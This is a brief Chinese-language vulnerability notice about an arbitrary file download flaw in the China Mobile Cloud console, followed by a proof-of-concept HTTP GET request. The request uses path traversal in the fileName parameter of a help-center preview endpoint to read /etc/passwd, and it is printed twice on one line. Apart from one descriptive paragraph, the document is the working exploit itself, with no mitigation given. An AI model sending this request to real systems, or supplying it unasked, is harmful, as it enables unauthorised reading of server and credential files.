漏洞描述
中国移动云控制台是一套用于统一查看和管理移动云产品及服务的系统,移动云控制台存在文件任意下载漏洞,攻击者可利用此漏洞获取任意文件信息。
移动云控制台存在任意文件下载漏洞
PoC代码
GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1GET /api/query/helpcenter/api/v2/preview?fileName=../../../../../../../../etc/passwd HTTP/1.1